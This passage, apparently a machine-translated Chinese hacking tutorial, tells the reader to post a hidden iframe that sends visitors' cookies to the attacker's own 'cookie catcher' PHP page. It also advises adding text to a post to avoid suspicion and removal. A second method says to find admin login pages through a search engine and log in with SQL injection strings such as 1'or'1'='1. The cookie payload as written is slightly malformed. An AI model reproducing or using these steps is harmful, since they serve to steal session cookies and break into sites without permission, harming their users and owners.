4 用你的饼干捕手张贴。在帖子中输入正确的代码,该代码将捕获 cookie 并将它们发送到您的站点。您需要在代码后添加一些文本以减少怀疑并防止您的帖子被删除。
- 示例代码如下所示
<iframe frameborder="0" height="0" width="0" src="javascript...:void(document.location='YOURURL/cookie catcher.PHP?c=' document.cookie)></iframe>
5 使用收集的 cookie。在此之后,您可以将 cookie 信息保存到您的网站,用于您需要的任何目的。
方法2 执行注入攻击
1 查找易受攻击的站点。由于易于访问的管理员登录,您将需要找到一个易受攻击的站点。尝试在您最喜欢的搜索引擎上搜索管理员登录。asp 或管理员 login.php。
2 以管理员身份登录。键入 admin 作为用户名并使用几个不同的字符串之一作为密码。这些可以是几个不同字符串中的任何一个,但一个常见的例子是 1'or'1'='1 or 2'='2。
3 要有耐心。这可能需要一些试验和错误。
